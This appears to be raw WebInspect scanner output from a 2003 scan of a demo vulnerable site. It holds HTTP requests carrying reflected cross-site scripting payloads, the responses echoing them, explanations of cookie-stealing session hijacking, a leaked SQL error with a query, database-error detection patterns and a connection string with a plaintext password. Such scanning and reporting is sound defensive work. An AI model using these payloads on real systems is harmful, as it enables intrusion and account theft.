A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>>"><script>alert("XSS")</script></attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=>"><script>alert("XSS")</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:31 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=<attack>>"><script>alert("XSS")</script></attack>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=</textarea><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 356
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = </textarea><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 133
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack></textarea><script>alert('XSS')</script></attack>&txtFirstName=Joe&txtLastName=Swinney<script>alert\('XSS'\)</script>POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert("XSS")</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= >"><script>alert("XSS")</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"><script>alert("XSS")</script></attack><script>alert\("XSS"\)<\/script>GET /cfmerror.html HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "344c36c1a8dc11:8f6"
Content-Length: 1931
</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP><HTML><HEAD><TITLE>Error Occurred While Processing Request</TITLE></HEAD><BODY><HR><H3>Error Occurred While Processing Request</H3><P> <TABLE BORDER><TR><TD><H4>Error Diagnostic Information</H4><P>ODBC Error Code = 37000 (Syntax error or access violation)<P><P> [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'and'.<P><P>SQL = "SELECT announce_id,announce_name title,city,state,ch_date,announce_cat.announce_cat_id,announce_desc text,city,state,contact_name,e_mail,phone,ext,fax,url,addr1,addr2,zip,announce_cat_name FROM announce_info,announce_cat WHERE announce_cat.announce_cat_id=announce_info.announce_cat_id and sport_code=1 and announce_name like'%>%' and announce_info.announce_cat_id= and ch_date>={ts '2001-02-23 08:22:42'} and del_flag=0 order by ch_date desc"<P>Data Source = "TDISCOVERY"<P><p>The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (38:1) to (38:48) in the template file E:\HTTP\TEAMDISCOVERY\Z\QUERIES\ALLANNOUNCESEARCH.CFM.</p><P><P>Date/Time: 03/23/01 08:22:42<BR>Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<BR>Remote Address: 65.80.86.150<BR>Query String: search=%3E&submit=blehbleh&state=&cat_id=<P></TD></TR></TABLE><P><HR>
</BODY></HTML>Database Server Error MessageA database server error message was found, indicating that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has received user input that it did not expect and does not know how to handle. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the database.<BR><BR>The most common cause of this error is a failure to properly sanitize client-supplied data that is used in SQL statements. It can also be caused by a bug in the web application's database communication code, a misconfiguration of database connection settings, or any other reason that would cause the application's database driver to be unable to establish a working session with the server.<P>The error message may also contain the location of the file that contains the offending function. This may disclose the webroot's absolute path as well as give the attacker the location of application "include" files or database configuration information. It may even disclose the portion of code that failed.
<BR><BR>
This check is part of WebInspect's unknown application testing. Unknown application testing seeks to uncover new vulnerabilities in both custom and commercial software. Because of this, there are no specific patches or descriptions of this issue.<br><br>Please note that this vulnerability may be a false positive if the page it is flagged on is technical documentation relating to a database server.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
[SQL\sServer] Or Microsoft\sOLE\sDB\sProvider\sfor\sODBC\sDrivers Or [ODBC\sMicrosoft\sAccess\s97\sDriver] Or [ODBC\sMicrosoft\sAccess\sDriver] Or Microsoft\sJET\sDatabase\sEngine Or [Oracle]ORA Or [ODBC\sdriver\sfor\sOracle] Or Microsoft\sOLE\sDB\sProvider\sfor\sOracle Or ODBC\sError Or [ODBC\sOracle\s8\sdriver] Or ADODB.Recordset.1 Or Microsoft\sOLE\sDB\sProvider\sfor\sSQL\sServer Or syntax\serror\sin\sorder\sby Or Dynamic\sPage\sGeneration\sError: Or quoted\sstring\snot\sproperly\sterminated Or DBD::Oracle Or COM.ibm.db2.jdbc.DB2ExceptionGET /cfmerror.html HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "344c36c1a8dc11:8f6"
Content-Length: 1931
</TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP><HTML><HEAD><TITLE>Error Occurred While Processing Request</TITLE></HEAD><BODY><HR><H3>Error Occurred While Processing Request</H3><P> <TABLE BORDER><TR><TD><H4>Error Diagnostic Information</H4><P>ODBC Error Code = 37000 (Syntax error or access violation)<P><P> [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'and'.<P><P>SQL = "SELECT announce_id,announce_name title,city,state,ch_date,announce_cat.announce_cat_id,announce_desc text,city,state,contact_name,e_mail,phone,ext,fax,url,addr1,addr2,zip,announce_cat_name FROM announce_info,announce_cat WHERE announce_cat.announce_cat_id=announce_info.announce_cat_id and sport_code=1 and announce_name like'%>%' and announce_info.announce_cat_id= and ch_date>={ts '2001-02-23 08:22:42'} and del_flag=0 order by ch_date desc"<P>Data Source = "TDISCOVERY"<P><p>The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (38:1) to (38:48) in the template file E:\HTTP\TEAMDISCOVERY\Z\QUERIES\ALLANNOUNCESEARCH.CFM.</p><P><P>Date/Time: 03/23/01 08:22:42<BR>Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<BR>Remote Address: 65.80.86.150<BR>Query String: search=%3E&submit=blehbleh&state=&cat_id=<P></TD></TR></TABLE><P><HR>
</BODY></HTML>ColdFusion Error MessageA possible ColdFusion error was detected. ColdFusion releases a lot of sensitive information in their error messages.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
Error\sDiagnostic\sInformationPOST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:58 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 440
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>"style="background:url\(javascript:alert\('XSS'\)\)GET /web/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:39 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (web)<B>Found Directory:</B> /web/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
